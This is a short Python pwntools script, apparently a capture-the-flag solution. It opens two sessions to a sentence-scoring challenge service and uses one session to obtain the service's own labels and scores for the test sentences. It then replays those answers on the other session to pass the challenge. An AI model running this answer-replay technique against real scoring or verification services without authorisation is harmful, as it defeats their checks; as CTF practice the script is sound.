exploit.py

import pwn
import sys
import re
import pprint
import json

pwn.context.log_level = 'debug'
lines = []

def get_answers(lines, conn):
    print("Retrieving the scores for the sentences:")
    pprint.pprint(lines)
    
    for i in range(5):
        conn.recvuntil(bytes(f"Sentence {i + 1}:", 'utf-8'))
        conn.sendline(lines[i])

    conn.recvuntil(bytes(f"The assessment of your sentences is:", 'utf-8'))
    # Get the results
    buffer = b''
    end_marker = 'Now it is your turn.'
    while True:
        data = conn.recv(512)
        buffer += data
        if end_marker in data.decode():
            break
    
    # Data up to the end_marker
    end_index = buffer.find(end_marker.encode())
    buffer = buffer[:end_index].strip()

    print("Received the following results:")
    pprint.pprint(buffer)
    conn.close()
    answers = json.loads(buffer)
    return answers

conn1 = pwn.remote(sys.argv[1], sys.argv[2])
conn2 = pwn.remote(sys.argv[1], sys.argv[2])

# Send 5 random sentences
for i in range(5):
    conn1.recvuntil(bytes(f"Sentence {i + 1}:", 'utf-8'))
    conn1.sendline(b"I am happy to see you")

# Get the results
#for i in range(5):
#    conn1.recvuntil(bytes(f"Sentence {i + 1} assessment:", 'utf-8'))
# lines[i] = conn1.recvline().strip()[len('Sentence X: '):]

for i in range(5):
    conn1.recvuntil(bytes(f"Sentence {i + 1} test:", 'utf-8'))
    lines.append(conn1.recvline().strip())

print("Received the following challenge lines:")
pprint.pprint(lines)

answers = get_answers(lines, conn2)

for i in range(5):
    conn1.recvuntil(bytes(f"Enter Sentence {i + 1}'s label:", 'utf-8'))
    conn1.sendline(bytes(answers[i]['label'], 'utf-8'))
    conn1.recvuntil(bytes(f"Enter Sentence {i + 1}'s score:", 'utf-8'))
    conn1.sendline(bytes(str(answers[i]['score']), 'utf-8'))

complete_output = ""
while True:
    try:
        output = str(conn1.recv())
    except:
        break
    if not output:
        break
    complete_output += output
    
print(complete_output)